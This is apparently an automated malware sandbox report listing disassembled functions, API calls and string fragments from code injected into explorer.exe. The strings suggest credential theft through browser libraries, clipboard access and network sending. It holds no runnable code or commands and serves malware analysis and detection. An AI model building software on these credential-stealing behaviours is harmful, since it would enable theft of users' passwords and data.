                                                            control_flow_graph 230 b732592-b7325d6 call b732012 call b739ea2 235 b732678-b73268c 230->235 236 b7325dc-b7325de 230->236 237 b7325e2-b7325f3 SleepEx 236->237 237->237 238 b7325f5-b732607 237->238 239 b732609-b73260f 238->239 240 b73263d-b732643 238->240 239->240 241 b732611-b732626 call b733002 239->241 240->237 242 b732645-b73264b 240->242 241->240 247 b732628-b732638 call b732a42 241->247 242->237 244 b73264d-b732653 242->244 244->237 246 b732655-b732666 call b733e12 call b7394a2 244->246 252 b73266b-b732673 call b7323f2 246->252 247->240 252->237
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: sedZ
                                                            • API String ID: 3472027048-2633879532
                                                            • Opcode ID: 6dcd002bfcea47a475dcd30c8f498b6d1786970afda071307fb9eee976d50678
                                                            • Instruction ID: fa843c8f433bc85ebd6625fe754121baccf888a16af1437ebbdba736ffe6f2c2
                                                            • Opcode Fuzzy Hash: 6dcd002bfcea47a475dcd30c8f498b6d1786970afda071307fb9eee976d50678
                                                            • Instruction Fuzzy Hash: 84218134618A0D9FCF94EF5890D86AAB3A1FF98700F4805BEE91FCB25BCB7094408B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B736FE2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 255 b736fe2-b737015 256 b737017-b737039 call b739ea2 255->256 257 b73703f-b737067 send 255->257 256->257
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID: send
                                                            • API String ID: 2809346765-2809346765
                                                            • Opcode ID: 1ee46418cff6721d721e8f9e41fcb1eb4584227953c034a995a80b2533f2b2ca
                                                            • Instruction ID: 07166dc04caf28ac62e7af906eaa7700e80590537e9bfa275fa97ed9d415653d
                                                            • Opcode Fuzzy Hash: 1ee46418cff6721d721e8f9e41fcb1eb4584227953c034a995a80b2533f2b2ca
                                                            • Instruction Fuzzy Hash: E5011E30618A0C8FDB94EF5CD489B15BBE0FB58315F1541AEE94DCB366C774D8418B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B736ECC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 260 b736ecc-b736f0a 261 b736f34-b736f55 socket 260->261 262 b736f0c-b736f2e call b739ea2 260->262 262->261
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: sock
                                                            • API String ID: 98920635-2415254727
                                                            • Opcode ID: a57875fa75c6e3f5b321f54aac1f99b435a152903f1406868c3df24587c4377d
                                                            • Instruction ID: 3f5fd4d0e1766ef9e8c24a1c8701c4c1cea972b79f033adfda7f07ab7c1aa103
                                                            • Opcode Fuzzy Hash: a57875fa75c6e3f5b321f54aac1f99b435a152903f1406868c3df24587c4377d
                                                            • Instruction Fuzzy Hash: 6E019E70518A488FCB84EF5CD488B14BBE0EB98711F1941BEE84DCB336C6B4C985CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B736ED2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 265 b736ed2-b736f0a 266 b736f34-b736f55 socket 265->266 267 b736f0c-b736f2e call b739ea2 265->267 267->266
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: sock
                                                            • API String ID: 98920635-2415254727
                                                            • Opcode ID: bcc887fa829b667fede88864fb0eb293f6e85a19797cec2823927b849fdb3987
                                                            • Instruction ID: 5d8c38a851e8662099cffdb8fc6432bbf2132655f470bc57ae7323287488450b
                                                            • Opcode Fuzzy Hash: bcc887fa829b667fede88864fb0eb293f6e85a19797cec2823927b849fdb3987
                                                            • Instruction Fuzzy Hash: BA017130618A488FCB84EF5CD488B14BBE0EB98315F1541BEE80DCB376C6B4D9818B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B73949C Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 270 b73949c-b7394d6 271 b7394d9-b7394dd 270->271 272 b739559-b739562 271->272 273 b7394df-b7394e2 271->273 272->271 274 b739568-b739571 272->274 273->272 275 b7394e4-b73954f call b73b302 call b73b2d2 call b73a4e2 273->275 276 b739573-b73957a 274->276 277 b7395aa-b7395c6 274->277 275->272 289 b739551-b739557 SleepEx 275->289 279 b73958f-b739598 276->279 280 b73957c-b73957d 276->280 279->277 283 b73959a-b7395a1 279->283 282 b739583-b73958d 280->282 282->279 282->282 283->277 285 b7395a3-b7395a4 283->285 285->277 289->272
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 4248373c8694370eb1805682491476144b7a287319e5201eb84ef844d1f1bc41
                                                            • Instruction ID: 995d293588e5f226d1e8f148dc3083422b20a454747fa1dbe68f66edce77dd23
                                                            • Opcode Fuzzy Hash: 4248373c8694370eb1805682491476144b7a287319e5201eb84ef844d1f1bc41
                                                            • Instruction Fuzzy Hash: EF31E77151CB488FDB29CF1CD88A5ED73E0FB95B10F40065EE58B87256DB71A9428AC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B7394A2 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 290 b7394a2-b7394d6 291 b7394d9-b7394dd 290->291 292 b739559-b739562 291->292 293 b7394df-b7394e2 291->293 292->291 294 b739568-b739571 292->294 293->292 295 b7394e4-b73954f call b73b302 call b73b2d2 call b73a4e2 293->295 296 b739573-b73957a 294->296 297 b7395aa-b7395c6 294->297 295->292 309 b739551-b739557 SleepEx 295->309 299 b73958f-b739598 296->299 300 b73957c-b73957d 296->300 299->297 303 b73959a-b7395a1 299->303 302 b739583-b73958d 300->302 302->299 302->302 303->297 305 b7395a3-b7395a4 303->305 305->297 309->292
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 2fd45663a1038a5a94dc233c7226f481f8f85ebd8bedfe90d9bcb4832de7f5eb
                                                            • Instruction ID: daf581266f55cf5926805eaf05e1c6e4e4e8352460809ddec88f47afcc84edf8
                                                            • Opcode Fuzzy Hash: 2fd45663a1038a5a94dc233c7226f481f8f85ebd8bedfe90d9bcb4832de7f5eb
                                                            • Instruction Fuzzy Hash: D831B87151CB488FDB29CF0CD88A5ED73E1FB95B10F40065EE58B87256DB71A9828AC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B733E12 Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 310 b733e12-b733e25 311 b733eb4-b733eb9 310->311 312 b733e2b-b733e33 310->312 312->311 313 b733e35-b733e3d 312->313 313->311 314 b733e3f-b733e47 313->314 314->311 315 b733e49-b733e51 314->315 315->311 316 b733e53-b733e5b 315->316 316->311 317 b733e5d-b733e65 316->317 317->311 318 b733e67-b733e6d OpenClipboard 317->318 318->311 319 b733e6f-b733e85 318->319 321 b733e87-b733e93 319->321 322 b733ea9-b733eb0 319->322 321->322 325 b733e95-b733ea1 call b733bf2 321->325 322->311 325->322
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: ClipboardOpen
                                                            • String ID:
                                                            • API String ID: 2793039342-0
                                                            • Opcode ID: 0aa77a4daafa2be209797d25c3a8d2b61060d8b757608ddc1086c76d5a214abf
                                                            • Instruction ID: 64ad5806befcdebce7c0e262ea7bf238a8984362a77d68d7bb1734ecf689d579
                                                            • Opcode Fuzzy Hash: 0aa77a4daafa2be209797d25c3a8d2b61060d8b757608ddc1086c76d5a214abf
                                                            • Instruction Fuzzy Hash: 33111231154E0A8FDB66AB28849C7B972D1FB48706F5905B8A41ACE1D2DF36C9C6CF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B732692 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 8a02b5bedf2afae44128a68701fb4fef63357b81bf7a235a3a3acc23155da806
                                                            • Instruction ID: d26583250cdd4aa67bcf5331c530fb8824ca39eaeddb5a8607c47b459333b20b
                                                            • Opcode Fuzzy Hash: 8a02b5bedf2afae44128a68701fb4fef63357b81bf7a235a3a3acc23155da806
                                                            • Instruction Fuzzy Hash: 9BF0C830618A094FCB88EF2CD4C566AB3E0FBDC200F44063EA94EC7255DE35C5818B11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B736F57 Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 337 b736f57-b736f59 338 b736f5b-b736f5f 337->338 339 b736fbc-b736fbf 337->339 338->339 340 b736fc5-b736fe0 WSAStartup 339->340
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID:
                                                            • API String ID: 724789610-0
                                                            • Opcode ID: f590186ad7397b95e5bf20697edfddad9b4dc60dbaa29ff06539c3268c12cfa3
                                                            • Instruction ID: 25cb73714afabe747f85dec4a25fa9691d28452278d1ac2a468efa505a0a3f05
                                                            • Opcode Fuzzy Hash: f590186ad7397b95e5bf20697edfddad9b4dc60dbaa29ff06539c3268c12cfa3
                                                            • Instruction Fuzzy Hash: 94E0C261408A448FDF809A889088E56B7D4EBD9390B05405AE828CF25AD6519891D772
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 11942279 Relevance: 11.7, Strings: 9, Instructions: 448COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .dll$32.d$M$S$el32$kern$ll$sedZ$user
                                                            • API String ID: 0-2283910409
                                                            • Opcode ID: 3ace169c4cd29c24a096799b58b70996c97453f293c8d9665f672340815473d1
                                                            • Instruction ID: a5be6a3bb7afecf87a17f34a99c7d101c379373ef4a26bcfdc1e89efa37d5f7e
                                                            • Opcode Fuzzy Hash: 3ace169c4cd29c24a096799b58b70996c97453f293c8d9665f672340815473d1
                                                            • Instruction Fuzzy Hash: 7FF18974618A4A9FC759DF38C584BEAF3E1FB98304F60462E906ECB641EF34A551CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 11946992 Relevance: 56.5, Strings: 45, Instructions: 209COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                            • API String ID: 0-3558027158
                                                            • Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                            • Instruction ID: 10f4036992fb43c8537c13b41ae4dac08f4e0b680700a2518bbd20c7e9f217a4
                                                            • Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                            • Instruction Fuzzy Hash: 2E9141F04483948AC7158F55A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 11943E5F Relevance: 26.5, Strings: 21, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: UR$.$2$: $: $A$D$L: $M$Pass$T$User$a$f$l$l$n$name$r$word$z
                                                            • API String ID: 0-1505927383
                                                            • Opcode ID: 1a476b855b823868770a1dbbad98bcc70853f80c90dc5505875ef97f200922fc
                                                            • Instruction ID: b424940081246ddf185bb122c2aeb1513dca07a82c43131f441c34630c1c2c08
                                                            • Opcode Fuzzy Hash: 1a476b855b823868770a1dbbad98bcc70853f80c90dc5505875ef97f200922fc
                                                            • Instruction Fuzzy Hash: A3A1DE70B187488BDB19DFA8D5446EEB7E1FF98304F10462EE48ED7241EF3499458785
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 11943E62 Relevance: 26.5, Strings: 21, Instructions: 292COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: UR$.$2$: $: $A$D$L: $M$Pass$T$User$a$f$l$l$n$name$r$word$z
                                                            • API String ID: 0-1505927383
                                                            • Opcode ID: 15768b89b75a75aacc4a0c96ae45fe82ea39e38239c0ac5e56392b6cde7486ca
                                                            • Instruction ID: 989e0eac3b81818ecde2c2681b05ff15e83b34b04bb4dfcfe422e3d2abe5b81e
                                                            • Opcode Fuzzy Hash: 15768b89b75a75aacc4a0c96ae45fe82ea39e38239c0ac5e56392b6cde7486ca
                                                            • Instruction Fuzzy Hash: B491DD70B187488BDB19DFA895447EEB7E1FF98304F10462EE48ED7241EF3499458789
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 11942BF2 Relevance: 7.7, Strings: 6, Instructions: 164COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: U$b$d$k$n$o
                                                            • API String ID: 0-1739295752
                                                            • Opcode ID: b9672a707205c04d0cfc369c19c2cd4805bff4f438f4056e34ce2e88de7d3d63
                                                            • Instruction ID: f088dcdedd78211fd7d94cbbef581b94dabfd138a1478f32846152421630a9ba
                                                            • Opcode Fuzzy Hash: b9672a707205c04d0cfc369c19c2cd4805bff4f438f4056e34ce2e88de7d3d63
                                                            • Instruction Fuzzy Hash: 5E518E78A14A0E8BCB09EFA4D9847DEB3B1FF54304F104229C56EDB241EF34AA548BC5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 119441BF Relevance: 6.5, Strings: 5, Instructions: 209COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .dll$cryp$dll$nss3$t32.
                                                            • API String ID: 0-1478216402
                                                            • Opcode ID: e4a98a43c0f74aaba4832ec8b22b1c11687576b7b4c1f3cecf4378d519a96ac9
                                                            • Instruction ID: ab89a81764ea332b8ac66d64f657aa7b53d1d75d2ea26a7ad7f032bcb4f45b69
                                                            • Opcode Fuzzy Hash: e4a98a43c0f74aaba4832ec8b22b1c11687576b7b4c1f3cecf4378d519a96ac9
                                                            • Instruction Fuzzy Hash: D3718E30A28B0A8FEB49DF68C1447EAB7E1FF18705F50462E942EC7684EB74A954C7C5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 119441C2 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .dll$cryp$dll$nss3$t32.
                                                            • API String ID: 0-1478216402
                                                            • Opcode ID: b8451f1ca966967bc36a4eb44aba9ca77004575d1264d112c1eadb2dc26626c6
                                                            • Instruction ID: 56194d69ab069c3655c0a5ad1299a3d144f80c7988e388db4e4dcd5f646cb56b
                                                            • Opcode Fuzzy Hash: b8451f1ca966967bc36a4eb44aba9ca77004575d1264d112c1eadb2dc26626c6
                                                            • Instruction Fuzzy Hash: 9A617D30A28B0A8FEB49DF68C1443EAB7E1FF18705F50462E942EC7684DB74A954C7C5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 119417E2 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                            • API String ID: 0-1970020201
                                                            • Opcode ID: c74d3b383538b7e7d2380c08440389b45a4654fa0bd78061fd59ed2808973ff4
                                                            • Instruction ID: 0c1a5a074f15b76e691c90ea73a658722183b39af18c7e3a3997709779bdc68e
                                                            • Opcode Fuzzy Hash: c74d3b383538b7e7d2380c08440389b45a4654fa0bd78061fd59ed2808973ff4
                                                            • Instruction Fuzzy Hash: A2619C70A18B4D8BDB54DFA4C084AEEB7E1FF58300F504A2E949FEB604EF34A5418B85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 11944462 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: -Age$User$nt: $on.d$urlm
                                                            • API String ID: 0-1987325725
                                                            • Opcode ID: 8e6d898b0d8aa8bf5b1cfee9b365fe9ba51cf3aa0ae9aac90c25f02f1de6fda5
                                                            • Instruction ID: 084e6a52ae913b77b44c5dc16c7031c686b77a0f982203c93c58a0ca72a22d27
                                                            • Opcode Fuzzy Hash: 8e6d898b0d8aa8bf5b1cfee9b365fe9ba51cf3aa0ae9aac90c25f02f1de6fda5
                                                            • Instruction Fuzzy Hash: 2A31F130B14A4D8FCF05EFA8C8843EEB7E0FB58209F50422ED45EEB640DE789A458785
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 11942002 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .dll$el32$h$kern
                                                            • API String ID: 0-4264704552
                                                            • Opcode ID: 0f400f86617a5bbacd181677c8d83001f79fa89c1ca7532b102919b2ba6ae738
                                                            • Instruction ID: 587d5faf967ca6ad0c374f7e7b27c9b91d6cc7cfae88d85a3357f09177935af2
                                                            • Opcode Fuzzy Hash: 0f400f86617a5bbacd181677c8d83001f79fa89c1ca7532b102919b2ba6ae738
                                                            • Instruction Fuzzy Hash: A741D174608B498FD7A9CF6891843AABBE5FB98301F204A7E95AEC3651DF70C445CB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:7.6%
                                                            Dynamic/Decrypted Code Coverage:1.5%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:1089
                                                            Total number of Limit Nodes:116
                                                            execution_graph 33104 4529540 LdrInitializeThunk 33106 27cebae 33107 27ceb9f 33106->33107 33108 27cebb3 33106->33108 33110 27d7350 33108->33110 33111 27d7364 33110->33111 33112 27d7693 33110->33112 33111->33112 33149 27dc030 33111->33149 33112->33107 33115 27d7482 33115->33107 33116 27d7478 33152 27dc840 33116->33152 33117 27d7495 33155 27dc740 33117->33155 33120 27d74bc 33158 27de2d0 33120->33158 33122 27d7657 33125 27dc870 2 API calls 33122->33125 33123 27d766d 33215 27d7080 33123->33215 33126 27d765e 33125->33126 33126->33107 33128 27d7680 33128->33107 33129 27d7560 33130 27d75c7 33129->33130 33132 27d756f 33129->33132 33130->33122 33131 27d75da 33130->33131 33254 27dc6c0 33131->33254 33134 27d7588 33132->33134 33135 27d7574 33132->33135 33138 27d758d 33134->33138 33139 27d75a5 33134->33139 33253 27d6f40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33135->33253 33161 27d6fe0 33138->33161 33139->33126 33173 27d6d00 33139->33173 33141 27d757e 33141->33107 33143 27d763a 33258 27dc870 33143->33258 33144 27d759b 33144->33107 33147 27d75bd 33147->33107 33148 27d7646 33148->33107 33261 27dd3a0 33149->33261 33151 27d7449 33151->33115 33151->33116 33151->33117 33153 27dd3a0 LdrLoadDll 33152->33153 33154 27dc85c NtDeleteFile 33153->33154 33154->33115 33156 27dd3a0 LdrLoadDll 33155->33156 33157 27dc75c NtCreateFile 33156->33157 33157->33120 33271 27dca50 33158->33271 33160 27d74c8 33160->33115 33160->33122 33160->33123 33160->33129 33162 27d6ffc 33161->33162 33163 27dc6c0 LdrLoadDll 33162->33163 33164 27d701d 33163->33164 33165 27d7038 33164->33165 33166 27d7024 33164->33166 33167 27dc870 2 API calls 33165->33167 33168 27dc870 2 API calls 33166->33168 33169 27d7041 33167->33169 33170 27d702d 33168->33170 33274 27de3f0 33169->33274 33170->33144 33172 27d704c 33172->33144 33174 27d6d7e 33173->33174 33175 27d6d4b 33173->33175 33177 27d6ec9 33174->33177 33180 27d6d9a 33174->33180 33176 27dc6c0 LdrLoadDll 33175->33176 33178 27d6d66 33176->33178 33179 27dc6c0 LdrLoadDll 33177->33179 33181 27dc870 2 API calls 33178->33181 33185 27d6ee4 33179->33185 33182 27dc6c0 LdrLoadDll 33180->33182 33183 27d6d6f 33181->33183 33184 27d6db5 33182->33184 33183->33147 33187 27d6dbc 33184->33187 33188 27d6dd1 33184->33188 33292 27dc700 LdrLoadDll 33185->33292 33190 27dc870 2 API calls 33187->33190 33191 27d6dec 33188->33191 33192 27d6dd6 33188->33192 33189 27d6f1e 33193 27dc870 2 API calls 33189->33193 33194 27d6dc5 33190->33194 33201 27d6df1 33191->33201 33280 27de3b0 33191->33280 33195 27dc870 2 API calls 33192->33195 33196 27d6f29 33193->33196 33194->33147 33197 27d6ddf 33195->33197 33196->33147 33197->33147 33198 27d6e03 33198->33147 33201->33198 33283 27dc7f0 33201->33283 33202 27d6e57 33203 27d6e6e 33202->33203 33291 27dc680 LdrLoadDll 33202->33291 33205 27d6e8a 33203->33205 33206 27d6e75 33203->33206 33207 27dc870 2 API calls 33205->33207 33208 27dc870 2 API calls 33206->33208 33209 27d6e93 33207->33209 33208->33198 33210 27d6ebf 33209->33210 33286 27de0d0 33209->33286 33210->33147 33212 27d6eaa 33213 27de2d0 2 API calls 33212->33213 33214 27d6eb3 33213->33214 33214->33147 33216 27dc6c0 LdrLoadDll 33215->33216 33217 27d70be 33216->33217 33218 27d70dc 33217->33218 33219 27d70c7 33217->33219 33221 27d714a 33218->33221 33222 27d7100 33218->33222 33220 27dc870 2 API calls 33219->33220 33235 27d70d0 33220->33235 33224 27d714f 33221->33224 33225 27d7190 33221->33225 33223 27dc7a0 2 API calls 33222->33223 33226 27d7125 33223->33226 33227 27dc7f0 2 API calls 33224->33227 33224->33235 33228 27d71a2 33225->33228 33234 27d730b 33225->33234 33229 27dc870 2 API calls 33226->33229 33230 27d717a 33227->33230 33231 27d71a7 33228->33231 33243 27d71df 33228->33243 33229->33235 33232 27dc870 2 API calls 33230->33232 33233 27dc7a0 2 API calls 33231->33233 33236 27d7183 33232->33236 33238 27d71c7 33233->33238 33234->33235 33239 27dc870 2 API calls 33234->33239 33235->33128 33236->33128 33237 27d71e4 33237->33235 33242 27dc7a0 2 API calls 33237->33242 33240 27dc870 2 API calls 33238->33240 33241 27d733c 33239->33241 33244 27d71d0 33240->33244 33241->33128 33245 27d7204 33242->33245 33243->33237 33248 27d72b7 33243->33248 33244->33128 33246 27dc870 2 API calls 33245->33246 33247 27d720f 33246->33247 33247->33128 33248->33235 33293 27dc7a0 33248->33293 33251 27dc870 2 API calls 33252 27d72fc 33251->33252 33252->33128 33253->33141 33255 27dd3a0 LdrLoadDll 33254->33255 33256 27d7622 33255->33256 33257 27dc700 LdrLoadDll 33256->33257 33257->33143 33259 27dd3a0 LdrLoadDll 33258->33259 33260 27dc88c NtClose 33259->33260 33260->33148 33262 27dd425 33261->33262 33264 27dd3af 33261->33264 33262->33151 33264->33262 33265 27d7760 33264->33265 33266 27d777a 33265->33266 33268 27d776e 33265->33268 33266->33262 33268->33266 33270 27d7be0 LdrLoadDll 33268->33270 33269 27d78cc 33269->33262 33270->33269 33272 27dd3a0 LdrLoadDll 33271->33272 33273 27dca6c RtlFreeHeap 33272->33273 33273->33160 33277 27dca10 33274->33277 33276 27de40a 33276->33172 33278 27dd3a0 LdrLoadDll 33277->33278 33279 27dca2c RtlAllocateHeap 33278->33279 33279->33276 33281 27dca10 2 API calls 33280->33281 33282 27de3c8 33281->33282 33282->33201 33284 27dd3a0 LdrLoadDll 33283->33284 33285 27dc80c NtReadFile 33284->33285 